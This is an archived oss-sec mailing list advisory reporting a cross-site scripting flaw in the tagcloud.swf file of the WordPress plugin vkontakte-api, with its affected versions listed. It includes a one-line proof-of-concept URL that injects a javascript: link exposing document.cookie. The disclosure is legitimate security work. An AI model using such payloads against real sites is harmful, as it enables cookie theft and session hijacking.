oss-sec mailing list archives
CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability
From: Henri Salo <henri () nerv fi>
Date: Mon, 11 Mar 2013 09:44:33 +0200
Hello list members, Plugin URL: http://wordpress.org/extend/plugins/vkontakte-api/ Affected file: tagcloud.swf 368b01e1728111f99d93ac5805d97abbb899a910 PoC: wp-content/plugins/vkontakte-api/swf/tagcloud.swf?mode=tags&tagcloud=<tags><a+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27>oss-security</a></tags> Affected versions: 1.21, 1.22, 1.23, 1.24, 1.25, 1.26, 1.27, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.7 Currently no fix available. -- Henri Salo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability Henri Salo (Mar 11)
- Re: CVE-2009-4168: WordPress plugin vkontakte-api XSS vulnerability Henri Salo (Mar 14)